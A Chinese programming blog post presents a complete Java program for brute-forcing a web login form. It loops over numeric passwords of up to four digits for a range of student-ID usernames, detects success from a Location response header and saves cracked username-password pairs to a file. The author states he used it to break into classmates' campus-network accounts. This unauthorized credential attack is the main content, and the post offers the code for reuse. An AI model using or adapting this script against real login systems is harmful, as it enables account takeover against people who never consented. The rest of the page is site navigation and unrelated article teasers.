首页    技术博客    PHP教程    数据库技术    前端开发   HTML5    Nginx    php论坛
新用户注册 | 会员登录
加入会员,解锁专属内容
取消
热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

Java网络编程五:暴力法破解登录系统的完全实现

作者:小宋提刑官_783 | 来源:互联网 | 2023-02-06 15:59
nsitionalENhttp:www.w3.orgTRxhtml1DTDxhtml1-transitional.dtd

注:以下破解思路及代码源自我同学木子

1、先来看一个无任何安全措施的登录系统的破解方法:每次模拟表单提交,若登录成功,此时返回的报头信息中有Location字段,登录失败无此字段,继续模拟登录。直到破解成功,本人成功破解部分同学校园网登录密码(纯四位数字的)代码如下:

  1. >package demo.net;  
  2.   
  3. import java.io.IOException;  
  4. import java.io.PrintWriter;  
  5. import java.net.HttpURLConnection;  
  6. import java.net.URL;  
  7.   
  8. import mine.util.io.TextFile;  
  9.   
  10. //暴力法破解简单登录系统:该系统无任何安全措施   
  11. public class PostTest {  
  12.     String urlString = "登录页面的url";  
  13.   
  14.     public PostTest() {  
  15.     }  
  16.   
  17.     public PostTest(String urlString) {  
  18.         this.urlString = urlString;  
  19.     }  
  20.   
  21.     // 提交一次用户请求   
  22.     private boolean doPost(String user, String password) {  
  23.         boolean sucess = false;  
  24.         try {  
  25.             URL realUrl = new URL(urlString);  
  26.             HttpURLConnection conn = (HttpURLConnection) realUrl  
  27.                     .openConnection();  
  28.             conn.setDoOutput(true);  
  29.             conn.setDoInput(true);  
  30.             conn.setInstanceFollowRedirects(false);  
  31.   
  32.             // 提交表单,发送的数据是直接用Firebug截取的然后把用户名,密码部分换成参数   
  33.             PrintWriter out = new PrintWriter(conn.getOutputStream());  
  34.             out.print("要提交的表单信息");  
  35.             out.flush();  
  36.   
  37.             // 如果登录不成功,报头中没有Location字段,getHeaderField("Location") 返回null   
  38.             // 登录成功,返回一个随机的Location字段   
  39.             // System.out.println(conn.getHeaderFields());   
  40.             if (conn.getHeaderField("Location") != null) {  
  41.                 sucess = true;  
  42.             }  
  43.         } catch (IOException e) {  
  44.             e.printStackTrace();  
  45.         }  
  46.         return sucess;  
  47.     }  
  48.   
  49.     // 这是一个全排列算法, 对特定长度的密码排列组合,把结果存入list   
  50.     // user:用户名 , n:字符下标 , len:字符数组长度,也就是密码长度   
  51.     private boolean createPassWord(String user, char[] str, int n, int len) {  
  52.         if (n == len) {  
  53.             String ps = new String(str);  
  54.             if (doPost(user, ps)) {  
  55. //              System.out.println("sucess:" + user + " : " + ps);   
  56.                 TextFile.write("file/校园网用户名及密码.txt"true"sucess:" + user  
  57.                         + " : " + ps + "\n");  
  58.                 return true;  
  59.             }  
  60.             return false;  
  61.         }  
  62.         for (int i = 0; i <= 9; i++) {  
  63.             str[n] = (char) (i + '0');  
  64.             if (createPassWord(user, str, n + 1, len))  
  65.                 return true;  
  66.         }  
  67.         return false;  
  68.     }  
  69.   
  70.     // 破解一个用户的密码   
  71.     public void test(String user) {  
  72.         for (int i = 0; i < 4; i++) {  
  73.             if (createPassWord(user, new char[i + 1], 0, i + 1))  
  74.                 break;  
  75.         }  
  76.     }  
  77.   
  78.     public static void main(String[] args) {  
  79.         PostTest pt = new PostTest();  
  80.         for (int i = 1; i <= 9; i++)  
  81.             pt.test("09050510" + i);  
  82.         for (int i = 10; i <= 31; i++)  
  83.             pt.test("0905051" + i);  
  84.     }  
  85. }  
  86.   

这个示例代码中只破解密码为4位或4位数字之内的密码,大概破解一个用户需要十分钟。如果破解5、6...更长的密码,破解时间将很长。


推荐阅读
  • php

    Java实现大数乘法(分治算法)

    本文介绍了使用Java实现大数乘法的分治算法,包括输入数据的处理、普通大数乘法的结果和Karatsuba大数乘法的结果。通过改变long类型可以适应不同范围的大数乘法计算。 ... [详细]
  • ip

    CSS3选择器的使用方法详解,提高Web开发效率和精准度

    CSS3选择器的使用方法详解,提高Web开发效率和精准度
    本文详细介绍了CSS3新增的选择器方法,包括属性选择器的使用。通过CSS3选择器,可以提高Web开发的效率和精准度,使得查找元素更加方便和快捷。同时,本文还对属性选择器的各种用法进行了详细解释,并给出了相应的代码示例。通过学习本文,读者可以更好地掌握CSS3选择器的使用方法,提升自己的Web开发能力。 ... [详细]
  • ip

    android listview OnItemClickListener失效原因

    android listview OnItemClickListener失效原因
    最近在做listview时发现OnItemClickListener失效的问题,经过查找发现是因为button的原因。不仅listitem中存在button会影响OnItemClickListener事件的失效,还会导致单击后listview每个item的背景改变,使得item中的所有有关焦点的事件都失效。本文给出了一个范例来说明这种情况,并提供了解决方法。 ... [详细]
  • php

    C#之数据集:DataSet对象的使用及相关方法详解

    本文介绍了C#中数据集DataSet对象的使用及相关方法详解,包括DataSet对象的概述、与数据关系对象的互联、Rows集合和Columns集合的组成,以及DataSet对象常用的方法之一——Merge方法的使用。通过本文的阅读,读者可以了解到DataSet对象在C#中的重要性和使用方法。 ... [详细]
  • php

    java 线程死锁模拟

    1,关于死锁的理解死锁,我们可以简单的理解为是两个线程同时使用同一资源,两个线程又得不到相应的资源而造成永无相互等待的情况。 2,模拟死锁背景介绍:我们创建一个朋友 ... [详细]
  • php

    《数据结构》学习笔记3——串匹配算法性能评估

    《数据结构》学习笔记3——串匹配算法性能评估
    本文主要讨论串匹配算法的性能评估,包括模式匹配、字符种类数量、算法复杂度等内容。通过借助C++中的头文件和库,可以实现对串的匹配操作。其中蛮力算法的复杂度为O(m*n),通过随机取出长度为m的子串作为模式P,在文本T中进行匹配,统计平均复杂度。对于成功和失败的匹配分别进行测试,分析其平均复杂度。详情请参考相关学习资源。 ... [详细]
  • ip

    Android开发笔记:使用Picasso加载网络图片等比例缩放

    在Android开发中,使用Picasso库可以实现对网络图片的等比例缩放。本文介绍了使用Picasso库进行图片缩放的方法,并提供了具体的代码实现。通过获取图片的宽高,计算目标宽度和高度,并创建新图实现等比例缩放。 ... [详细]
  • uri

    向QTextEdit拖放文件的方法及实现步骤

    向QTextEdit拖放文件的方法及实现步骤
    本文介绍了在使用QTextEdit时如何实现拖放文件的功能,包括相关的方法和实现步骤。通过重写dragEnterEvent和dropEvent函数,并结合QMimeData和QUrl等类,可以轻松实现向QTextEdit拖放文件的功能。详细的代码实现和说明可以参考本文提供的示例代码。 ... [详细]
  • default

    Java容器中的compareto方法排序原理解析

    Java容器中的compareto方法排序原理解析
    本文从源码解析Java容器中的compareto方法的排序原理,讲解了在使用数组存储数据时的限制以及存储效率的问题。同时提到了Redis的五大数据结构和list、set等知识点,回忆了作者大学时代的Java学习经历。文章以作者做的思维导图作为目录,展示了整个讲解过程。 ... [详细]
  • php

    Mac OS 升级到11.2.2 Eclipse打不开了,报错Failed to create the Java Virtual Machine

    Mac OS 升级到11.2.2 Eclipse打不开了,报错Failed to create the Java Virtual Machine
    本文介绍了在Mac OS升级到11.2.2版本后,使用Eclipse打开时出现报错Failed to create the Java Virtual Machine的问题,并提供了解决方法。 ... [详细]
  • ip

    baresip android编译、运行教程1语音通话

    baresip android编译、运行教程1语音通话
    本文介绍了如何在安卓平台上编译和运行baresip android,包括下载相关的sdk和ndk,修改ndk路径和输出目录,以及创建一个c++的安卓工程并将目录考到cpp下。详细步骤可参考给出的链接和文档。 ... [详细]
  • php

    Linux进程控制块PCBtask_struct结构体结构及作用详解

    本文详细介绍了Linux中进程控制块PCBtask_struct结构体的结构和作用,包括进程状态、进程号、待处理信号、进程地址空间、调度标志、锁深度、基本时间片、调度策略以及内存管理信息等方面的内容。阅读本文可以更加深入地了解Linux进程管理的原理和机制。 ... [详细]
  • controller

    后台获取视图对应的字符串

    后台获取视图对应的字符串
    1.帮助类后台获取视图对应的字符串publicclassViewHelper{将View输出为字符串(注:不会执行对应的ac ... [详细]
  • controller

    XML介绍与使用的概述及标签规则

    XML介绍与使用的概述及标签规则
    本文介绍了XML的基本概念和用途,包括XML的可扩展性和标签的自定义特性。同时还详细解释了XML标签的规则,包括标签的尖括号和合法标识符的组成,标签必须成对出现的原则以及特殊标签的使用方法。通过本文的阅读,读者可以对XML的基本知识有一个全面的了解。 ... [详细]
  • ip

    计算机存储系统的层次结构及其优势

    计算机存储系统的层次结构及其优势
    本文介绍了计算机存储系统的层次结构,包括高速缓存、主存储器和辅助存储器三个层次。通过分层存储数据可以提高程序的执行效率。计算机存储系统的层次结构将各种不同存储容量、存取速度和价格的存储器有机组合成整体,形成可寻址存储空间比主存储器空间大得多的存储整体。由于辅助存储器容量大、价格低,使得整体存储系统的平均价格降低。同时,高速缓存的存取速度可以和CPU的工作速度相匹配,进一步提高程序执行效率。 ... [详细]
author-avatar
小宋提刑官_783
这个家伙很懒,什么也没留下!
Tags | 热门标签
RankList | 热门文章
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有